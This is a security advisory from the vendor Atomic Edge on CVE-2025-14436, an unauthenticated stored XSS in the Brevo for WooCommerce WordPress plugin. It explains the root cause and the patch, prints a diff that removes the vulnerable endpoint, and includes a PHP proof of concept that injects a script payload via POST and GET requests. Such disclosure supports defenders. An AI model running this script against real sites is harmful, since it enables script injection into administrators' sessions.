What is CVE-2025-14436?

CVE-2025-14436 is a high-severity vulnerability in the Brevo for WooCommerce plugin for WordPress, specifically affecting versions up to 4.0.49. It allows unauthenticated attackers to exploit stored Cross-Site Scripting (XSS) via the ‘user_connection_id’ parameter, enabling them to inject malicious scripts that execute in the context of users accessing affected pages.

How does the vulnerability work?

The vulnerability exists due to insufficient input sanitization and output escaping in the plugin’s callback endpoint. Attackers can send malicious payloads through the ‘user_connection_id’ parameter, which are then stored in the WordPress database and executed when an administrator or other user views the affected plugin administration page.

Who is affected by this vulnerability?

Any WordPress site using the Brevo for WooCommerce plugin version 4.0.49 or earlier is vulnerable. Administrators should check their plugin version in the WordPress dashboard and update if necessary to ensure they are not at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Brevo for WooCommerce plugin and verify that the version is 4.0.50 or later. If it is 4.0.49 or earlier, your site is at risk.

How can I fix or mitigate this issue?

The recommended fix is to update the Brevo for WooCommerce plugin to version 4.0.50 or later, which contains a patch that removes the vulnerable callback functionality. Regularly updating all plugins and themes is crucial for maintaining site security.

What does the CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high severity vulnerability. This means that successful exploitation could lead to significant security risks, including unauthorized access to sensitive data, session hijacking, or administrative account takeover, particularly affecting users with higher privileges.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to the execution of arbitrary JavaScript in the context of authenticated users, potentially resulting in session hijacking, site defacement, or the installation of backdoors. The stored nature of the vulnerability means that once exploited, all users who access the affected page are at risk until the malicious payload is removed.

How does the proof of concept demonstrate the issue?

The proof of concept provided illustrates how an attacker can exploit the vulnerability by sending a specially crafted HTTP POST request to the vulnerable endpoint with a malicious payload. This payload is stored in the database and executed when an administrator views the affected page, demonstrating the risk of stored XSS.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Brevo for WooCommerce plugin until a patch can be applied. Additionally, review user permissions and restrict access to the WordPress admin area to minimize potential exposure.

Is there a way to prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, ensure that all plugins and themes are regularly updated, implement security best practices such as input validation and output escaping, and conduct regular security audits of your WordPress site. Utilizing security plugins can also help monitor for vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14436: Brevo for WooCommerce <= 4.0.49 – Unauthenticated Stored Cross-Site Scripting (woocommerce-sendinblue-newsletter-subscription)

CVE ID CVE-2025-14436

Plugin woocommerce-sendinblue-newsletter-subscription

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 4.0.49

Patched Version 4.0.50

Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14436:
This vulnerability is an unauthenticated stored cross-site scripting (XSS) flaw in the Brevo for WooCommerce WordPress plugin. The vulnerability exists in the plugin’s callback endpoint handler, allowing attackers to inject malicious scripts via the `user_connection_id` parameter. The CVSS score of 7.2 reflects the high impact of stored XSS that requires no authentication.

Atomic Edge research identified the root cause as insufficient input sanitization and output escaping in the `sendinblue_woocommerce_callback()` function. The function, defined in `woocommerce-sendinblue-newsletter-subscription/woocommerce-sendinblue.php` lines 169-195, directly processes the `user_connection_id` parameter from both POST data and query strings without proper validation. The code retrieves user input via `filter_input(INPUT_POST, ‘user_connection_id’)` and `$queries[‘user_connection_id’]`, then stores it directly into the WordPress options database using `update_option()` or `add_option()`. No sanitization occurs before storage, and no output escaping occurs when the value is later displayed.

Exploitation occurs through the `/sendinblue-callback` endpoint, which the plugin registers via WordPress rewrite rules. Attackers send HTTP POST or GET requests containing malicious JavaScript payloads in the `user_connection_id` parameter. The payload is stored in the WordPress database option `SENDINBLUE_WC_USER_CONNECTION_ID`. When an administrator or other privileged user views a plugin administration page that displays this stored value, the malicious script executes in their browser session. The attack requires no authentication because the callback endpoint lacks access controls.

The patch completely removes the vulnerable callback functionality. The diff shows the deletion of the `sendinblue_woocommerce_callback()` function and its associated rewrite rule registration. The plugin version changes from 4.0.49 to 4.0.50 in the main file. The patch also removes the `callback` parameter from API request constructions in `admin-manager.php` and `update-plugin-manager.php`. Before the patch, the plugin exposed a publicly accessible endpoint that accepted unsanitized input. After the patch, this endpoint no longer exists, eliminating the attack vector entirely.

Successful exploitation allows attackers to inject arbitrary JavaScript that executes in the context of authenticated users who view affected administration pages. This can lead to session hijacking, administrative account takeover, site defacement, or malware distribution. Attackers could manipulate the WordPress database, create new administrator accounts, or install backdoors. The stored nature means a single successful injection affects all users who view the compromised page until the payload is removed.

Differential between vulnerable and patched code

Code Diff

--- a/woocommerce-sendinblue-newsletter-subscription/src/managers/admin-manager.php
+++ b/woocommerce-sendinblue-newsletter-subscription/src/managers/admin-manager.php
@@ -85,7 +85,6 @@
             $query_params['consumerSecret'] = $key->consumer_secret;
             $query_params['language'] = current(explode("_", get_locale()));
             $query_params['url'] = get_home_url();
-            $query_params['callback'] = $query_params['url'] . '/index.php?pagename=sendinblue-callback';

             $connectUrl = SendinblueClient::INTEGRATION_URL . SendinblueClient::CONNECT_URL . '?' . http_build_query($query_params);

--- a/woocommerce-sendinblue-newsletter-subscription/src/managers/update-plugin-manager.php
+++ b/woocommerce-sendinblue-newsletter-subscription/src/managers/update-plugin-manager.php
@@ -287,7 +287,6 @@
         $settings['shop_version'] = SENDINBLUE_WORDPRESS_SHOP_VERSION;
         $settings['plugin_version'] = SENDINBLUE_WC_PLUGIN_VERSION;
         $settings['language'] = current(explode("_", get_locale()));
-        $settings['callback'] = get_site_url() . '/index.php?pagename=sendinblue-callback';

         $key = $this
             ->api_manager
--- a/woocommerce-sendinblue-newsletter-subscription/woocommerce-sendinblue.php
+++ b/woocommerce-sendinblue-newsletter-subscription/woocommerce-sendinblue.php
@@ -6,7 +6,7 @@
  * Author: Brevo
  * Text Domain: woocommerce-sendinblue-newsletter-subscription
  * Domain Path: /languages
- * Version: 4.0.49
+ * Version: 4.0.50
  * Author URI: https://www.brevo.com/?r=wporg
  * Requires at least: 4.3
  * Tested up to: 6.8.1
@@ -47,7 +47,7 @@
 define('SENDINBLUE_WC_EMAIL_SETTINGS', 'sendinblue_woocommerce_email_options_settings');
 define('SENDINBLUE_WC_VERSION_SENT', 'sendinblue_woocommerce_version_sent');
 define('API_KEY_V3_OPTION_NAME', 'sib_wc_api_key_v3');
-define('SENDINBLUE_WC_PLUGIN_VERSION', '4.0.49');
+define('SENDINBLUE_WC_PLUGIN_VERSION', '4.0.50');
 define('SENDINBLUE_WORDPRESS_SHOP_VERSION', $GLOBALS['wp_version']);
 define('SENDINBLUE_WOOCOMMERCE_UPDATE', 'sendinblue_plugin_update_call_apiv3');
 define('SENDINBLUE_REDIRECT', 'sendinblue_woocommerce_redirect');
@@ -153,46 +153,12 @@
         delete_option(SENDINBLUE_REDIRECT);
         wp_redirect(add_query_arg('page', 'sendinblue', admin_url('admin.php')));
     }
-    add_filter('rewrite_rules_array', 'sendinblue_woocommerce_rewrites');
-    add_action('template_redirect', 'sendinblue_woocommerce_callback');

     load_plugin_textdomain( SENDINBLUE_WC_TEXTDOMAIN , false, dirname(plugin_basename(__FILE__)) . '/languages');
     $admin_manager = new AdminManager();
     $admin_manager->run();
 }

-function sendinblue_woocommerce_rewrites($wp_rules)
-{
-    add_rewrite_rule("sendinblue-callback$", "index.php?pagename=sendinblue-callback");
-
-    return $wp_rules;
-}
-
-function sendinblue_woocommerce_callback()
-{
-    $pageNameVar = get_query_var('pagename');
-    if ($pageNameVar == 'sendinblue-callback') {
-        $result = array('status' => false);
-        $user_connection_id = filter_input(INPUT_POST, 'user_connection_id');
-
-        if(empty($user_connection_id)) {
-            $query_string = $_SERVER['QUERY_STRING'] ?? $_SERVER['QUERY_STRING'];
-
-            if (!empty($query_string)) {
-                parse_str($query_string, $queries);
-                $user_connection_id = $queries['user_connection_id'] ?? $queries['user_connection_id'];
-            }
-        }
-
-        if(isset($user_connection_id) && !empty($user_connection_id)) {
-            (get_option(SENDINBLUE_WC_USER_CONNECTION_ID, null) !== null) ? update_option(SENDINBLUE_WC_USER_CONNECTION_ID, $user_connection_id) : add_option(SENDINBLUE_WC_USER_CONNECTION_ID, $user_connection_id);
-            header('HTTP/1.1 200 OK', true);
-            $result = array('status' => true);
-        }
-        wp_send_json($result);
-    }
-}
-
 function sendinblue_woocommerce_activate()
 {
     if (!function_exists('is_plugin_active')) {
@@ -206,7 +172,6 @@
         return;
     }
     global $wp_rewrite;
-    add_filter('rewrite_rules_array', 'sendinblue_woocommerce_rewrites');
     $wp_rewrite->flush_rules();
     (get_option(SENDINBLUE_REDIRECT, null) !== null) ? update_option(SENDINBLUE_REDIRECT, true) : add_option(SENDINBLUE_REDIRECT, true);
 }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14436 - Brevo for WooCommerce <= 4.0.49 - Unauthenticated Stored Cross-Site Scripting

<?php

$target_url = 'http://vulnerable-wordpress-site.com';

// The payload to inject - this creates an alert and demonstrates script execution
$payload = '<script>alert("Atomic Edge XSS Test - CVE-2025-14436");</script>';

// Encode the payload for URL transmission
$encoded_payload = urlencode($payload);

// Target the vulnerable callback endpoint
$endpoint = $target_url . '/sendinblue-callback';

// Prepare the POST request with the malicious user_connection_id
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'user_connection_id=' . $encoded_payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the attack
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check if the injection was successful
if ($http_code == 200) {
    echo "[+] Payload injected successfully.n";
    echo "[+] The malicious script will execute when an administrator views the Brevo plugin settings.n";
    echo "[+] Check the response: " . htmlspecialchars($response) . "n";
} else {
    echo "[-] Injection failed. HTTP Code: $http_coden";
    echo "[-] The site may not be vulnerable or the endpoint is not accessible.n";
}

// Alternative GET method for testing
echo "n[+] Testing GET method...n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint . '?user_connection_id=' . $encoded_payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    echo "[+] GET method also successful.n";
} else {
    echo "[-] GET method failed. HTTP Code: $http_coden";
}

?>

Frequently Asked Questions

What is CVE-2025-14436?
Understanding the vulnerability
CVE-2025-14436 is a high-severity vulnerability in the Brevo for WooCommerce plugin for WordPress, specifically affecting versions up to 4.0.49. It allows unauthenticated attackers to exploit stored Cross-Site Scripting (XSS) via the ‘user_connection_id’ parameter, enabling them to inject malicious scripts that execute in the context of users accessing affected pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists due to insufficient input sanitization and output escaping in the plugin’s callback endpoint. Attackers can send malicious payloads through the ‘user_connection_id’ parameter, which are then stored in the WordPress database and executed when an administrator or other user views the affected plugin administration page.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Brevo for WooCommerce plugin version 4.0.49 or earlier is vulnerable. Administrators should check their plugin version in the WordPress dashboard and update if necessary to ensure they are not at risk.
How can I check if my site is vulnerable?
Verifying plugin versions
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Brevo for WooCommerce plugin and verify that the version is 4.0.50 or later. If it is 4.0.49 or earlier, your site is at risk.
How can I fix or mitigate this issue?
Updating the plugin
The recommended fix is to update the Brevo for WooCommerce plugin to version 4.0.50 or later, which contains a patch that removes the vulnerable callback functionality. Regularly updating all plugins and themes is crucial for maintaining site security.
What does the CVSS score of 7.2 indicate?
Understanding risk levels
A CVSS score of 7.2 indicates a high severity vulnerability. This means that successful exploitation could lead to significant security risks, including unauthorized access to sensitive data, session hijacking, or administrative account takeover, particularly affecting users with higher privileges.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to the execution of arbitrary JavaScript in the context of authenticated users, potentially resulting in session hijacking, site defacement, or the installation of backdoors. The stored nature of the vulnerability means that once exploited, all users who access the affected page are at risk until the malicious payload is removed.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided illustrates how an attacker can exploit the vulnerability by sending a specially crafted HTTP POST request to the vulnerable endpoint with a malicious payload. This payload is stored in the database and executed when an administrator views the affected page, demonstrating the risk of stored XSS.
What should I do if I cannot update the plugin immediately?
Temporary mitigations
If immediate updates are not possible, consider disabling the Brevo for WooCommerce plugin until a patch can be applied. Additionally, review user permissions and restrict access to the WordPress admin area to minimize potential exposure.
Is there a way to prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, ensure that all plugins and themes are regularly updated, implement security best practices such as input validation and output escaping, and conduct regular security audits of your WordPress site. Utilizing security plugins can also help monitor for vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations